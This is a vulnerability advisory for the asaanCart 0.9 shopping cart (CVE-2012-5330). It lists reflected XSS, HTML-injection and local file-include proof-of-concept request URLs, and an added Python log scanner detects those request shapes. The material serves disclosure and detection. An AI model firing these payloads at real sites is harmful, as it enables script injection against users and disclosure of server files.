asaanCart Cross-Site Scripting Vulnerability

Published: 2012-03-14
Updated: 2012-10-10

Affected systems:
sourceforge asaanCart 0.9
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52498
CVE ID: CVE-2012-5330

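asaanCart is an online shopping cart solution developed for small businesses.

asaanCart 0.9 contains multiple XSS vulnerabilities that allow remote attackers to inject arbitrary web script or HTML via PATH_INFO to calc.php, chat.php, register.php, or index.php, or via the page parameter to libs/smarty_ajax/index.php.

<*Source: Number 7
  *>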

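Test method:
--------------------------------------------------------------------------------

Warning

The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!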

for the HTML-injection vulnerabilities:
%20v-0.9/libs/smarty_ajax/calc.php/%22onmouseover=prompt(944322)%3E%3Cu%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EInjection%20Here%3C/big%3E%3C/big%3E%3C/big%3E%3C/big%3E%3C/u%3E
%20v-0.9/libs/smarty_ajax/chat.php/%22onmouseover=prompt(998415)%3E%3CBig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cu%3EHtml%20Injection%20HerE.%3C/u%3E%3C/Big%3E%3C/big%3E%3C/big%3E%3C/big%3E
%20v-0.9/libs/smarty_ajax/register.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E
%20v-0.9/libs/smarty_ajax/index.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E

for the cross-site scripting vulnerability:
%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3E

for the local file-include vulnerability:
%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../templates\add_product
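
A log-review check for the request shapes listed above, added here as an example (it is not part of the original advisory or of asaanCart). The /shop path prefix, client address and finding names are constructed, and treating page=1 as the benign form is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of an attribute or tag.
MARKUP_RE = re.compile(r'[<>"\']')
# A ".." segment delimited by "/" or "\" (the advisory's sample mixes both).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify(target):
    """Return the findings for one raw (still percent-encoded) request target."""
    findings = set()
    path, _, query = target.partition("?")
    # PATH_INFO is whatever follows the script name, e.g. calc.php/<extra>.
    match = re.search(r"\.php/(.*)$", unquote(path), re.S)
    if match and MARKUP_RE.search(match.group(1)):
        findings.add("markup-in-path-info")
    for value in parse_qs(query, keep_blank_values=True).get("page", []):
        if MARKUP_RE.search(value):
            findings.add("markup-in-page")
        if TRAVERSAL_RE.search(value):
            findings.add("traversal-in-page")
    return findings


def scan(log_lines):
    """Yield (line_number, findings) for every log line with a finding."""
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST_RE.search(line)
        findings = classify(request.group(1)) if request else set()
        if findings:
            yield number, sorted(findings)


# Constructed sample log: the /shop prefix and client address are made up;
# the request shapes are the ones listed in the advisory.
SAMPLE_LOG = [
    r'192.0.2.10 - - [14/Mar/2012:10:00:01 +0000] "GET /shop/libs/smarty_ajax/index.php?_=&f=update_intro&page=1 HTTP/1.1" 200 512',
    r'192.0.2.10 - - [14/Mar/2012:10:00:02 +0000] "GET /shop/libs/smarty_ajax/calc.php/%22onmouseover=prompt(944322)%3E HTTP/1.1" 200 512',
    r'192.0.2.10 - - [14/Mar/2012:10:00:03 +0000] "GET /shop/libs/smarty_ajax/index.php?_=&f=update_intro&page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3E HTTP/1.1" 200 512',
    r'192.0.2.10 - - [14/Mar/2012:10:00:04 +0000] "GET /shop/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../templates\add_product HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The request target is decoded once, as the web server would before handing PATH_INFO and the query string to PHP, so percent-encoded markup is matched in its decoded form.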

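Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

sourceforge
-----------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: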
